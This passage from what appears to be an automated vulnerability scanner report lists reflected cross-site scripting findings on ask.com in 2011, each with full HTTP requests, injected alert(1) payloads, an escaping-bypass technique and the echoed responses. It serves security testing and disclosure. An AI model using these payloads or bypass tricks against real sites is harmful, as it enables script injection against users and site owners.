The value of the darturi request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67cf'%3balert(1)//22cd3871f2d was submitted in the darturi parameter. This input was echoed as b67cf';alert(1)//22cd3871f2d in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2fb67cf'%3balert(1)//22cd3871f2d &dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q= HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Mar 2011 16:07:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5435

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Dart ad</title>
<style type="text/css">
html, body { border: 0px;...[SNIP]...
<script type="text\/javascript" src="http://ad.doubleclick.net/adj/b67cf';alert(1)//22cd3871f2d 5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1300982823595?">...[SNIP]...
1.10. http://www.ask.com/fifdart [q parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.ask.com
Path: /fifdart
Issue detail
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3880\'%3b487775315e3 was submitted in the q parameter. This input was echoed as b3880\\';487775315e3 in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Request
GET /fifdart?dartsite=5480ask.testsite&dartsitelive=5480.iac.usa.ask.hp.x.x.dir&darturi=ad.doubleclick.net%2fadj%2f&dartsize=300x250&darttile=&darts=as&dartpos=&darthhi=159&darttest=0&dartcata=&dartcatb=&dartcatc=&dartclid=&dartgclient=ca-aj-cat&dartgchannel=&dartgadtype=image%2cflash&dartgadoutput=js&dartgadsafe=high&q=b3880\'%3b487775315e3 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:18 GMT Connection: close Vary: Accept-Encoding Content-Length: 5447 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <title>Dart ad</title> <style type="text/css"> html, body { border: 0px;...[SNIP]... <script type="text/javascript"> var google_ad_client = 'ca-aj-cat'; var google_ad_channel = ''; var google_hints = 'b3880\\';487775315e3 '; var google_ad_output = 'js'; var google_max_num_ads = '1'; var google_page_url = ''; var google_ad_type = 'image,flash'; var google_image_...[SNIP]...
1.11. http://www.ask.com/pictureslanding [l parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ask.com
Path: /pictureslanding
Issue detail
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5362'%3balert(1)//6c83d7bc0b1 was submitted in the l parameter. This input was echoed as e5362';alert(1)//6c83d7bc0b1 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pictureslanding?o=0&l=dire5362'%3balert(1)//6c83d7bc0b1 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:15 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: user="o=0&l=dire5362';alert(1)//6c83d7bc0b1"; Domain=.ask.com; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjE1LVVUQw%3D%3D&po=0&pp=dire5362%27%3Balert%281%29%2F%2F6c83d7bc0b1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:15 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:15 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 60162 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]... var _matchUrl = '/afc-match?q=&page=1&ac=24&qid=EED0381CB3DE1A4CD1C9D292F4AE1964&qsrc=121&dm=all&qrt=2&lid=5489&o=0&l=dire5362';alert(1)//6c83d7bc0b1 '; _matchUrl+= "&userip=173.193.214.243"; _matchUrl+="&losid=a&locid=ph&lodid=us"; ...[SNIP]...
1.12. http://www.ask.com/ [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c256'-alert(1)-'db57f994a76 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=05c256'-alert(1)-'db57f994a76 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:30 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjMwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:30 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:30 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94938 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... (this);});if ( $j('#theme_content').length === 0 ) {$j(document).hp_impression('http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=54316&l=dir&o=0&ld=5489&sv=0a5c404d&ip=adc1d6f3&ord=5682108&wz_cu=05c256'-alert(1)-'db57f994a76 ');}$j(document).hp_impression('http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404d&p=homepage&ord=5682108&wz_cu=05c256'-alert(1)-'db57f994a76','http://wzus1.ask.com/i/i.gif?t=a...[SNIP]...
1.13. http://www.ask.com/ [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 781e9"-alert(1)-"7361eca1de3 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0781e9"-alert(1)-"7361eca1de3 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94939 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... fo || {};WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404e&ip=adc1d6f3&id=34DCE713F223CA78BB1D757F3FBA4260&q=&p=0&qs=121&ac=24&g=29482SYG0AZ4yY&wz_cu=0781e9"-alert(1)-"7361eca1de3 ";WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&l=dir&o=0&ld=5489&sv=0a5c404e&ip=adc1d6f3&id=34DCE713F223CA78BB1D757F3FBA4260&q=&p=0&qs=121&ac=24&g=29482SYG0AZ4yY&wz_cu=0781e9"-a...[SNIP]...
1.14. http://www.ask.com/ [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2fb9"><script>alert(1)</script>40177c2bbf4 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0f2fb9"><script>alert(1)</script>40177c2bbf4 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:28 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjI3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:27 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:27 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 95179 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... <img src="http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=54316&l=dir&o=0&ld=5489&sv=0a5c404c&ip=adc1d6f3&ord=5358244&wz_cu=0f2fb9"><script>alert(1)</script>40177c2bbf4 " border='0' width='1' height='1' alt="">...[SNIP]...
1.15. http://www.ask.com/ [wz_uid cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The value of the wz_uid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8dc19'-alert(1)-'8ae2608854 was submitted in the wz_uid cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F38dc19'-alert(1)-'8ae2608854 ; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:41 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:41 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:41 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94545 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... <iframe/>');el.attr('src','http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F38dc19'-alert(1)-'8ae2608854 ;u4=;u3=;u2=0;ord=-333468697?').attr('width','1').attr('height','1').attr('frameborder','0');$j('body').append(el);});JASK.namespace("hp.dialogs");$j(document).ready(function() {$j.each(JASK.hp.dialogs...[SNIP]...
1.16. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The value of the wz_cu cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50ad9"-alert(1)-"a0bdbc42f40 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=050ad9"-alert(1)-"a0bdbc42f40 ; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: no-cache Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:12:41 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:41 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:41 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118456 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... (); st.height = 1; st.width = 1; st.id = "SessionTracker"; st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407e&p=ja-question&rf=0&ord=6734329&wz_cu=050ad9"-alert(1)-"a0bdbc42f40 "; </script>...[SNIP]...
1.17. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails [wz_cu cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The value of the wz_cu cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6aabe"><script>alert(1)</script>5f5b1f54996 was submitted in the wz_cu cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
